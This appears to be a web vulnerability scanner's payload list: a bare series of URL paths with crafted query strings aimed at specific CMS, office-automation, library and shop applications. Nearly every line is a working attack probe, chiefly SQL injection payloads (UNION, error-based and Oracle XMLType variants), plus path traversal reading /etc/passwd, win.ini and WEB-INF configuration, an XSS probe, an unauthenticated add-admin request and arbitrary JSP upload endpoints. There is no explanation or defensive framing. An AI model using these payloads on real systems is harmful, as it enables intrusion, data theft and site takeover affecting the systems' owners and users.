/feReport/chartList.jsp?delId=1&reportId=1%20and%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--
/jsearch/admin/opr_forcechangepwd.jsp
/home/front/search/opr_chatsearch.jsp?action=simplesearch&words=1%25%27%20union%20all%20select%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20DUAL%20--
/celive/live/index.php?action=1
/admin/Site/AddDomain.aspx?Edit=1&id=1000/**/%20/**/union/**/%20/**/all/**/%20/**//**/SELECT/**/%200,/**/CHAR(106)%2bCHAR(106)%2bCHAR(106),0,0,'',0,2014,0/**/FROM/**/%20ZL_Manager
/baseNews_view.jsp?newsId=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--
/Lesktop/command.aspx
/Lesktop/Management/DeptEdit.aspx?did=1%20and%20char(106)%3E0
/Lesktop/sendfile.aspx
/Office_Supplies/Goods_Main.aspx?type=1&info_id=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/Personnel/Infomation.aspx?userid=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/Personnel/VacationComputation.aspx?id=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/RCMANAGE_New/rcgl.aspx?UID=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/ObjSwitch/HYTZ.aspx?userid=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/modules/pdflist.aspx?info_id=1/**/union/**/all/**/select/**/null,null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),null,null,null/**/from/**/dual%20--
/jcms/m_5_e/init/sitesearch/opr_classajax.jsp?classid=1%20union%20all%20select%2012,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20from%20dual%20--
/lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,md5(1122),0x7e),NULL,NULL,NULL,NULL
/lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL%23
/jcms/jcms_files/jcms1/web2/site/module/comment/opr_readfile.jsp?filename=opr_readfile.jsp
/managerNManager.action
/lm/manage/opr_setappraisal.jsp?fn_billstatus=E&vc_setapprid=-2087%20UNION%20ALL%20SELECT%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL%20FROM%20DUAL--
/jcms/m_1_9/column/getgroupuser.jsp?jgid=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)%20--&spell=2&webid=3&userid=4
/lm/sys/opr_bulletin_show.jsp?vc_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
/lm/front/mailpublist.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
/jcms/workflow/design/opr_model_class.jsp?fn_billstatus=E&vc_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100),NULL,NULL,NULL%20--
/jcms/m_5_5/m_5_5_1/objectbox/selectx_search.jsp?spell=1%25%27%20union%20all%20select%20null%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%20from%20dual%20--
/lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL%20--
/lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,0x7765627363616E3A693A66696E64,0x7e)%23
/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
/admini/question/question.aspx?ID=25'%20and%20char(106)%2bchar(106)%3E0%20--
/ModifyNewsAction.do?newsID=-12
/plugins/qmail/MailTo.aspx?mail=1%27and%02CHAR(106)%2bCHAR(39)%3E0%02and%02%271%27=%271
/manage/Template/DSManage.aspx
/index.php?id=product&c=project&cate=1&ext[id%3C0%20union%20select%20111,2,3,4,5,6,md5(1122),8,9%20,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--]=1
/api.php?id=_arclist&c=api&f=phpok&param[pid]=41&param[notin]=41)%20Union%20Select%201,md5(1122),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20
/admin/admin_adminmodifypwd.aspx
/jcms/m_5_6/ajax_printcol.jsp?cataid=1)%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)%20--
/feform/createprinttemplete.jsp?formid=1'%20AND%204321=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/fenc/syncsubject.jsp?pk_corp=1'%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/indexsearch/filter.jsp?tableId=1%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/Modules/jycg/SFDB.aspx?sfpjnm=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116),NULL%20--&type=1
/print/search_print_proof.jsp?proof_no=just_sql_test'
/include/user/mulbumentree.asp
/include/user/usertree.asp
/include/zidian/dantree.asp?ZiDian='%20AND%204321%3DCONVERT%28INT%2C%28SELECT%20CHAR%28106%29%2bCHAR%28117%29%2bCHAR%28115%29%2bCHAR%28116%29%2bCHAR%2895%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%28115%29%2bCHAR%28116%29%29%29%20--
/public/oa_nodebanliren_frm.asp
/include/chaxundetail.asp
/include/user/bdtreemx.asp
/admin/Fileup.aspx?path=notice/upload
/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20UNION%20SELECT%201,2,3,md5%281122%29,5,6,7,8,9%23
/inc/guestbook.php?do=guestbook&t=ajax&mid=1&content=testtesta%E9%8C%A6%27,(select%20concat%280x7c,md5%281122%29,0x7c%29from%20job_admin%20limit%201%29,NOW%28%29,1,1,3,1,if%281=2,1,char%28@%60%27%60%29%29%29%23@%60%27%60
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/hlp/help.asp?HlpCode=1'%20and%201=char(106)%20--
/Code/Common/SysCommonAttach.aspx?Method=GetNewID&IDs=isTrans&tabRecordId=1%27%20AND%201%3DCHAR%28106%29%20--
/ModifyNewsAction.do?newsID=-12'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%20%23
/piw/Site/KeyWordExport.jsp?ids=-111)%20union%20select%20Username,md5%281122%29,222,4444,5555%20from%20zduser%23
/schedule/Entrust.aspx?nidlist=0,1)/**/and/**/1=CHAR(106)%20--
/common/mod/ajax.ashx
/SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=-1'%20and%201=char(106)%20--
/dakai.aspx
/SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=3'%20and%201=char(106)%20--
/Permission/Application_Query_List.aspx?deptName=3'%20and%201=char(106)%20--
/main/model/childcatalog/zxzxinfo.jsp?MailId=13%20UNION%20ALL%20SELECT%20NULL,CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29,NULL,NULL,NULL,NULL,NULL,NULL%20--
/index_page/geren_list_page.aspx?server=1&refid=1'%20AND%201=CHAR(106)%2bCHAR(60)%20--
/website/level3.jsp?tablename=7&infoid=-1'%20UNION%20ALL%20SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29--
/varset/modifyTime.asp?varname=&id=495'%20union%20all%20select%201,2,3,0x66696E643A76756C,5,6,7,8,9%20from%20teachers%20--
/getpassword.php?do=login
/api/uc/uc.php?code=380dDbp0QmFDGmUR2ENTw7v%2B1YVER%2BKFyWB3YQN0OARXAr%2BIV4p1g3Ou5yA2CG6k%2BYdUOSb%2BwsiMwU4aqz2Gmtae60ut%2Fw
/servlet/FileDownload?filepath=c:/windows/win.ini&dispname=42873.txt
/servlet/FileDownload?filepath=/etc/passwd&dispname=42873.txt
/index.php?m=register&c=ajax_reg
/api/uc.php?code=8e347f1oWfxZ5isPSs7QBbA78aaJwxZCvdIIfY2niRLsrqrg0dHBfrkRSaOtzGxkncaWtRGPVKjVbHwZJSlI1JFH9WBN5wj%2Fsqj2Xg
/witapprovemanage/apprvaddNew.jsp?flowid=%27%20and%201=2%20UNION%20SELECT%201,2,3,4,char(106)%2bchar(60),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29;--%20-
/nicknamelogin.jsp
/jsearch/viewsnap.jsp?snapname=/../../../../../../../../../../../../../etc/passwd
/lm/objectbox/selectx_groupuserlist.jsp?vc_parid=-42873%27+or+%271%27=%271
/index.php?m=register&c=ajax_reg
/inc/ajax.asp?action=videoscore&id=1%20and%201=2%20union%20select%20CHR(106),CHR(99),3%20from%20%7Bpre%7Dmanager
/ajaxfs.php?tooltip=5254'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a);%20%23
/utilities.php?tail_lines=50&message_type=-1&go.x=10&go.y=9&refresh=20&reverse=1&filter=%22%3E%25%3Cscript%3Eprompt(42873)%3C/script%3E&page=1&action=view_logfile
/?q=node&destination=node
/UtilServlet?name=-1'%20UNION%20ALL%20SELECT%20NULL,%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)--%20&operation=getUserInfo&time=12
/jcms/m_5_e/module/individuation/opr_individuation_unit.jsp?fn_billstatus=B&sub_row=just_test
/govdiropen/jcms_files/jcms1/web1/site/zfxxgk/download/downannals.jsp?name=..././..././..././..././..././..././WEB-INF/ini/merpserver.ini&webid=1&type=1&downname=just_test.txt
/down.aspx?id=(select%20convert(int,(select%20char(106)))%20FROM%20syscolumns)
/api/CheckMemberLogin.ashx?type=mobileisexist
/comm/showpic.php?pic=aHR0cDovL3d3dy5zby5jb20vcm9ib3RzLnR4dA%3D%3D
/LoginCheck.aspx
/NodeProdCategory.aspx?action=GetChildNode&CategoryId=(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))
/index.php?c=api&m=data&auth=finecms&param=action%3Dcache%20name%3DSPACE-MODEL.1%27%5D%3Bprint%28md5%281122%29%29%3B%2f%2f
/Book/user_read.jsp?classId=1'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20and%20'at'='at
/show.jsp?id=5'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20AND%20'AT'='AT
/NTRdrS_RegistInfo.aspx?BookRecno=1'%20AND%209211=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'AT'='AT
/NTRdrBookRetrInfo.aspx?BookRecno='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20chr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(58)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%20from%20DUAL))%7C%7C'
/NTRdrBookRetrInfo.aspx?BookRecno=18273&NewBIBNO=111%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)&NEWBOOK=newbook
/NTBookRetrTopShowright.aspx?page=1&Index=6&LocLmt=&SrchTab=3&Acurate=3&Key='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%20from%20DUAL))%7C%7C'&AllName=A++
/zfcgFrame/xx_look.aspx?ID=-1%27%20UNION%20ALL%20SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29--%20
/AdminP
/lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23
/public/download.asp?filename=../login2.asp/
/Isv.ashx?action=addadmin&adminuser=admin&adminpassword=111111&guid=1
/index.php?controller=block&action=goodsCommend&id=0)%20Union%20select%201,md5(1122)%23
/API/DownloadProducts.ashx
/Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts%20Desc)%20AS%20RowNumber%20FROM%20vw_Hishop_BrowseProductList%20p%20WHERE%20SaleStatus%20=%201)%20T%20WHERE%201=1%20and%201=char(106)%20--
/ProductUnSales.aspx?keywords=uio%2527&tagIds=1_2))%20T%20WHERE%201=1%20and%201=(select%20char(106)%2bchar(106))%20--%20&pageIndex=1
/SubCategory.aspx?TagIds=1%20and%20char(106)%3E1
/MShop/Partial/SuppLogo
/ShoppingHandler.aspx
/bq/Data/BIData.zip
/jphoto/objectbox/selectx_search.jsp?spell=1%25%27%20UNION%20SELECT%20CHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2899%29%7C%7CCHR%2899%29%2Cnull%20FROM%20DUAL%20--
/vc/vc/columncount/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
/jact/workflow/design/index.jsp?flowcode=a'%20UNION%20ALL%20SELECT%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(107)%7C%7CCHR(109)%7C%7CCHR(108),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
/jis/manage/role/opr_approleinfo_user2.jsp?c_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(101)%2bCHAR(102)%2bCHAR(58)%2bCHAR(104)%2bCHAR(103)%2bCHAR(58)%2bCHAR(105),NULL,NULL--%20
/cms/voteManager/voteaction.jsp
/EditPhotoHandle.aspx?Action=EditCover&PhotoId=(SELECT%20CHAR(106)%2bCHAR(107))
/ShopManage.aspx
/RegionHandle.aspx?action=GetChildNode&ParentId=(select%20%20(char(106)%2bchar(100)))
/SNS/Product/WaterfallProductListData
/ProSales/GetListCate
/jphoto/jphoto/sys/member/opr_export.jsp
/JwGl/jxjh/JxjhXGBc.asp
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500-52-25-1.html
/defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../index.jsp
/defaultroot/public/select_user/search_org_list.jsp?searchName=a%27%20UNION%20ALL%20SELECT%20CONCAT%280x23%2C0x7765627363616E3A693A66696E64%2C0x23%29%2CNULL%23
/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(108)%2bCHAR(109)%2bCHAR(110),NULL,NULL,NULL,NULL,NULL,NULL--
/cjcx/xuesheng/czjl/shuru.asp?id=-28%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(100)%2bCHAR(100)%2bCHAR(60)%20--&xueke=
/cjcx/bkxt/yqts1.asp?newsid=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/cjcx/bkxt/xxpj.asp?id=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/cjcx/kagx/main3.asp?rjxk=dd'%20and%201=(CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))%20--&xqmc=%25&jsxm=&mc=&ktlx=&page=
/login.asp
/search.php
/LoginCheck4.asp?LoginLb=jwc&Account=1'%20AND%201=CHAR(106)%20--&PassWord=0
/jwgl/jxjh/jxjha.asp
/jwgl/jcxx/savetofile.asp
/public/jsp/livephotoupload.jsp?path=archives&mode=add&hiddenName=1.jsp&visualName=2.jsp
/Help.aspx?id=(SELECT%20CHAR(106)%2bCHAR(103)%2bCHAR(105)%2bCHAR(100))
/govezoffice/gov_documentmanager/senddocument_import.jsp?categoryId=1&path=archives&mode=add&fileName=1.jsp&saveName=2.jsp&fileMaxSize=0&fileMaxNum=100&fileType=jsp
/edoas2/edoas2_test.jsp
/Report/AjaxHandle/StationChoose/StationTree.ashx?STTP='KKK')%20AND%201587=CONVERT(INT,(CHAR(58)%2bCHAR(117)))%20--&RadioType=Radio_XZ&ReportID=Report22
/celive/live/header.php
/SystemManage/AjaxHandle/AjaxVertifyUserID.ashx?uid=1'%20AND%201=CHAR(106)%20--
/skywcm/webpage/download.jsp?absolutePath=C:%5Cwindows%5Cwin.ini&downFileName=win.ini
/RdrRInforDetail.aspx?page=1&Index=4&KeyWord=AA'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&name=r_infor&AcqSys=CN
/m/info/top_rating.action?clsNo=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'at'='at
/BaseCourse/RushTeamCollect.aspx?adcd=1&key=1%25'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
/Plan/FloodPlan/FileEdit.aspx?id=1'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
/BaseCourse/FloodDisastersQueryContent.aspx?areacode=1&DirTypeDetailId=1%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--&Name=1
/Disaster/Reporting/ReportingDetail.aspx?ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
/Disaster/Reporting/ReportingInfo.aspx?oper=update&ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
/Duty/AjaxHandle/Jquery.autocomplete/AutocompleteContactByName.ashx?_=&q=313%25'%20AND%203=CHAR(106)%2bCHAR(99)%20--&limit=10&timestamp=
/plan/FloodPlan/FloodPlanFileShow.aspx?ReadOnly=&ID=499'%20AND%203=CHAR(106)%2bCHAR(99)%20--&filetype=156&ParentID=0&adomParameter=292
/admin/admin_database.aspx
/flex/newsmessage.jsp?uname=-1122'%20AND%2012=(SELECT%20CHAR(99))%20--
/video/videoView.jsp?videoid=250%20AND%201=(SELECT%20CHAR(106)%2bCHAR(58))
/blue_show.aspx?paperName=hehe'%20and%201=(select%20char(106))%20--&qnum=20
/?m=product&s=list&key=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%23
/search.do?searchInfo=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
/ModifyNewsAction.do?newsID=364'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
/navigate.do?method=getPolicyinfoDataById&id=2631&menuNo=05'%20and%201=(select%20char(106))%20--
/model/TwoGradePage/Equipment_detail.aspx?id=11314%20and%201=(select%2bchar(106))%20--
/model/TwoGradePage/TrainSignUp.aspx?tblApparatusRepertoryListID=12%20and%201=(select%2bchar(106))%20--
/model/TwoGradePage/newsdetail.aspx?id=279&columnId=70%20and%201=(select%2bchar(106))
/cctrl/admin/news/contShow.php?id=2'%20and%20(select%201%20from%20%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%23
/cctrl/backup/index.php
/cctrl/admin/purview/purview.php
/data_Xbaby/gdjm133950.mdb
/admin/message_der.asp?id=7%20union%20select%201,chr(97),chr(106),4,5%20from%20admin
/admin/fuwu_der.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
/admin/fuwu_modi.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
/admin/upfile.asp
/admin/upfile_yqhy.asp
